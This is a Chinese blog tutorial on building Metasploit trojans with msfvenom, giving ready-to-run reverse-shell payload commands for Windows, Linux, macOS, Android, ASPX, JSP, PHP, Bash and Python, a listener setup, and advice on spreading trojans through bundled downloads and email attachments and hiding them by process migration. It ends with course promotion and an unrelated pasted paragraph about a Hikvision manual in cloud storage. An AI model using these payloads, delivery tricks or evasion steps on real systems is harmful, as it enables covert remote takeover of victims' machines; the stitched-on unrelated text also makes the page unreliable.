Metasploit木马生成教程,零基础入门到精通,收藏这篇就够了

0****1

概述

上次我们聊到了通过目标系统漏洞来获取目标的权限,其实我们除了可以通过目标系统的漏洞来获取 meterpreter 之外,还可以直接通过木马获取。

msfvenom 就是 MSF 中用来生成后门木马的模块,在目标机器上执行后门木马,然后在本地配置监听目标即可上线,攻击机即可获得 meterpreter。

msfvenom 是 msfpayload 和 msfencode 的组合,将这两个工具集成在一个框架实例中。

msfvenom 主要生成可执行程序、DLL 文件、Webshell 和 Shellcode 等。

0****2

相关参数

 -l <type>:列出相关类型(如 payloads, encoders, nops, platforms, archs, encrypt, formats, all)的所有模块信息。  -p <payload>:设置使用的 payload。  -p <payload> --list-options:列出指定的 payload 的相关参数。  -f <format>:设置输出格式。  --encoder <encoder>:设置所使用的编码器。  --service-name <value>:设置生成的二进制服务程序的名称。  --sec-name <value>:设置当生成大的 windows 二进制程序文件时使用的节(section)名。默认是四个随机字母组成的字符串。  --smallest:使用所有的编码器生成尽可能小的 payload。  --encrypt <value>:设置编码或加密 shellcode 的方式。  --encrypt-key <value>:设置加密密钥。  --encrypt-iv <value>:设置加密的初始向量 IV。  -a <arch>:设置 payload 使用的软件架构。  --platform <platform>:设置 payload 使用的平台。  -o <path>:将 payload 保存到指定的文件路径。  -b <list>:设置 payload 中需要避免的字符。  -n <length>:在 payload 中预置指定长度的滑板指令。  -s, --space <length>:设置生成的 payload 的最大文件大小。  --encoder-space <length>:设置编码后的 payload 的最大文件大小。  -i <count>:指定编码的次数。  -c <path> :指定包含额外的 win32 shellcode 的文件路径。  -x <path>:使用一个可执行文件当作模板。  -k:保留模板文件的功能,将 payload 作为线程注入。  -v <value>:为某些特定的输出格式指定变量名。  -t <second>:设置从 STDIN 读取 payload 的最长等待时间(单位为秒)。默认为 30 秒。设置为 0 表示禁用时间限制。  -h:输出帮助页面。

0****3

木马生成方法(MSF6)

这里针对不同的目标我们有不同的命令,但仔细看你会发现,命令整体结构其实差不多,区别主要在于目标架构不同。

Windows
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.49.139 LPORT=8888 -f exe > shell.exe``   ``msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.49.139 LPORT=8888 -f c

Linux
msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=192.168.49.139 LPORT=8888 -f elf > shell.elf

Mac
msfvenom -p osx/x86/shell_reverse_tcp LHOST=192.168.49.139 LPORT=8888 -f macho > shell.macho

Android
msfvenom -a dalvik -p android/meterpreter/reverse_tcp LHOST=192.168.49.139 LPORT=8888 -f raw > shell.apk``   ``msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.49.139 LPORT=8888 R > shell.apk

ASPX
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.49.139 LPORT= 8888 -f aspx -o shell.aspx

JSP
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.49.139 LPORT=8888 -f raw > shell.jsp

PHP
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.49.139 LPORT=8888 -f raw > shell.php

Bash
msfvenom -p cmd/unix/reverse_bash LHOST=192.168.49.139 LPORT=8888 -f raw > shell.sh

Python
msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.49.139 LPORT=8888 -f raw > shell.py

0****4

举例—木马攻击

MSF 创建监听

首先进入 msf。

msfconsole

然后依次输入以下命令即可。

use exploit/multi/handler``   ``set lhost 192.168.49.139  # 攻击机的IP``   ``set lport 8888    # 攻击机监听的端口``   ``set payload windows/x64/meterpreter/reverse_tcp``   ``run

生成木马

重新开一个窗口,执行以下命令,这里需要注意的是 IP、PORT 要保持和上面创建监听时的值一致,payload 也需要一致。

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.49.139 LPORT=8888 -f exe > shell.exe

然后将木马上传到目标系统

传播木马的常见方法

  • 直接通过漏洞上传到目标服务器。

  • 把木马和一个正常应用程序捆绑,发布到网上诱导用户下载。

  • 社工,通过邮件附件进行传播。

这里我们简单一点,直接把木马拖到目标系统上,中间的木马传播环节我们就省略了,主要看一下木马上线的效果。

执行即可上线

在目标系统上双击执行木马,然后到 msf 中查看目标是否上线。

进程迁移

最后做一下进程迁移主要是为了防止管理员发现木马进程并结束木马进程,所以我们可以通过迁移隐藏一下,增加应急的难度。

而且注入之后原来的木马程序就算被删除了也没关系,只要进程还在,我们的权限就一直在,用起来爽歪歪!

查看木马在目标系统上运行的进程。

getpid

查看目标系统上目前存活的进程,这里会有很多进程,我只截取了前面一部分。

ps

选一个稳定的进程,迁移到这个进程中。

migrate 4084

最后你会发现木马原本的进程 3432 就不存在了。

题外话

黑客&网络安全如何学习

今天只要你给我的文章点赞,我私藏的网安学习资料一样免费共享给你们,来看看有哪些东西。

1.学习路线图

在这里插入图片描述

攻击和防守要学的东西也不少,具体要学的东西我都写在了上面的路线图,如果你能学完它们,你去就业和接私活完全没有问题。

2.视频教程
网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我们和网安大厂360共同研发的的网安视频教程,之前都是内部资源,专业方面绝对可以秒杀国内99%的机构和个人教学!全网独一份,你不可能在网上找到这么专业的教程。

内容涵盖了入门必备的操作系统、计算机网络和编程语言等初级知识,而且包含了中级的各种渗透技术,并且还有后期的CTF对抗、区块链安全等高阶技术。总共200多节视频,200多G的资源,不用担心学不全。
在这里插入图片描述
因篇幅有限,仅展示部分资料,需要见下图即可前往获取

🐵这些东西我都可以免费分享给大家,需要的可以点这里自取👉:网安入门到进阶资源

3.技术文档和电子书
技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。

在这里插入图片描述

因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取

🐵这些东西我都可以免费分享给大家,需要的可以点这里自取👉:网安入门到进阶资源

4.工具包、面试题和源码
“工欲善其事必先利其器”我为大家总结出了最受欢迎的几十款款黑客工具。涉及范围主要集中在 信息收集、Android黑客工具、自动化工具、网络钓鱼等,感兴趣的同学不容错过。

还有我视频里讲的案例源码和对应的工具包,需要的话也可以拿走。

🐵这些东西我都可以免费分享给大家,需要的可以点这里自取👉:网安入门到进阶资源

最后就是我这几年整理的网安方面的面试题,如果你是要找网安方面的工作,它们绝对能帮你大忙。

这些题目都是大家在面试深信服、奇安信、腾讯或者其它大厂面试时经常遇到的,如果大家有好的题目或者好的见解欢迎分享。

参考解析:深信服官网、奇安信官网、Freebuf、csdn等

内容特点:条理清晰,含图像化表示更加易懂。

内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…

在这里插入图片描述

因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取

🐵这些东西我都可以免费分享给大家,需要的可以点这里自取👉:网安入门到进阶资源
————————————————

版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
侵权,请联系删除。

IVMS-4200用户手册云盘是指将IVMS-4200软件用户手册存储在云盘上的一种方式。IVMS-4200是海康威视(Hikvision)公司开发的一款视频监控管理软件,用户手册是为了帮助用户更好地了解和使用该软件而编写的说明书。 云盘是指通过网络将数据存储在云服务器上,用户可以通过网络访问、传输和管理云盘中的数据。将IVMS-4200用户手册存储在云盘上有以下几个优点: 首先,便捷性。用户无需下载和安装软件,只需通过浏览器登录云盘账号,就可以随时随地查阅用户手册。无论在何地、何时,只要有网络连接,就能方便地获取手册内容。 其次,共享性。云盘是一个共享的平台,多个用户可以同时访问同一个云盘上的用户手册。这就方便了团队协作和知识共享,不同用户之间可以互相学习和交流使用经验。 再次,实时更新。云盘上存储的用户手册可以随时进行更新和替换。开发者可以在云盘上上传新版本的手册,用户只需刷新页面即可查看最新的内容,减少了传统的纸质手册印刷、分发和更新的时间和成本。 最后,安全性。云盘通常具有安全机制,如账号密码验证、数据加密等,确保用户手册的安全性和隐私性。即使用户的电脑或移动设备丢失或损坏,手册仍然安全保存在云盘上,用户不会丢失使用说明。 综上所述,将IVMS-4200用户手册存储在云盘上,可以提高使用者的便捷性、共享性、实时更新性和安全性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值